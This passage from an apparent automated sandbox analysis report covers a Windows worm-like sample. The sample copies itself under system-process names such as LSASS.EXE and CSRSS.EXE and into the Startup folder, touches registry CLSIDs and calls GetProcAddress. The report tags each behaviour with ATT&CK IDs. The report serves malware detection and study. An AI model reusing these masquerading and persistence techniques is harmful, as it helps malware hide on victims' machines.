C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %WINDIR%\\system32\\Mig2.scr (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %WINDIR%\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location C:\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %WINDIR%\\system32\\Mig2.scr (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.scr to new location %WINDIR%\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.scr to new location C:\\xk.exe (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CopyFileA\" to copy C:\\\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"xk.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"Microsoft Outlook\" (Path: \"HKCU\\CLSID\\{0006F03A-0000-0000-C000-000000000046}\\LOCALSERVER32\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"PSDispatch\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00020420-0000-0000-C000-000000000046}\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched \"FileSystem Object\" (Path: \"HKCU\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xk.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Mig2.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"xk.exe\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"Mig2.scr\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"\n \"CSRSS.EXE\" file has an entrypoint instructions - \"push\t0x4044a8,call\t0x402504,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,aaa\t,adc\tal, 0xd7,pushal\t,adc\tbyte ptr [ecx - 3], 0x41,mov\tdl, byte ptr [esi],ret\t0xdbfc,xor\tah, byte ptr [ecx],xchg\tedi, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tdword ptr [eax], eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,js\t0x4025b5,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,add\tcl, cl,jb\t0x402594,adc\tch, byte ptr [esi + 0x52],dec\teax,mov\tbyte ptr [0x93deb45], al,lds\tebx, ptr [edi + edx*2 - 0x27d38d52],xchg\teax, edi,aaa\t,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005328)\n 